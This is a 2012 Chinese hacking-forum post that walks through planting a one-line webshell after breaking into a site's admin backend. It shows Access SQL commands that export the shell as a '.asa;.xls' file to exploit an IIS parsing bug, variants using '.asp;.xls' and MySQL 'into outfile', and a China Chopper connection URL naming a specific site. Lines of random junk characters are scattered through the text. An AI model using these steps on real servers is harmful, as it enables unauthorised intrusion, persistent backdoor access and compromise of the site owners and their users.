中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
! ~8 A" w, |8 @2 w# D- o
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
; T% Z1 C! n6 t! o8 r M
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
- o% h1 G# o4 T& Z, o
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
9 h( G3 p; a* K+ T" m. z
1.create table cmd (a varchar(50))
+ z8 j' L v R3 l, h
2.insert into cmd (a) values (‘‘)
H9 ?6 @/ c+ P$ U7 j
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
7 V9 x- i/ _6 g \+ F, a
(把表cmd的内容导出为物理路径的一个EXCEL文件)
, B2 j" y2 L+ u1 d, t% k1 x
4.drop table cmd
1 e" o5 h- R9 U" X: U
利用IIS的BUG成功拿到了WEBSHELL。
4 k; L7 n# Y; t
: H( [" c" Q/ t1 U
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
# L5 F$ z: R4 K2 f9 e6 l* n
2 u3 @- ]; ]: m6 A' \: v
SQL语句意思解释:
+ M0 P& ]5 {3 b( O# t0 o
第一句
2 y v3 w6 ]( O; T: ~9 C) J
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
, C5 K; D, C0 T, b$ \ T
5 `; j+ P5 Z& ]) p
第二句
) _1 ]% y O; x) S
在表cmd的a字段插入一句话木马
# A6 J$ Z# J' [0 z5 H/ t
第三句
& t- i% U& G1 z5 P* O2 N# A$ P$ e+ F
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
7 V& h- O* h* {9 [/ i
( A( P) Y9 D* c* C; c, x" ~* L
第四句
5 _$ H2 [. F5 c) u/ g. m: @. ^
删除建立的cmd表
2 n; i: t3 D- X/ T9 r
9 o; d% j. S5 s: E0 r
以下内容为测试:
* \1 x9 ~! L" t5 k. `. A: c% {/ }
Access利用后台SQL执行命令功能导出WebShell:
$ L4 A) I7 j1 m& W/ |- U
这个更简单:
. m$ S& v( l, E- z4 ~
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
* u3 |+ h6 i- x, Q" t
或者
* w# l; {, P# q
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* j/ h# T+ b% @+ v1 m
. y) `' T0 Q* f
后台有执行SQL语句功能(vote为已知表段)
) ~/ X3 j1 f4 h, R1 z. O
希望对大家有所帮助拿shell的又一个思路
1 u8 o4 U* D- _+ Q: [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2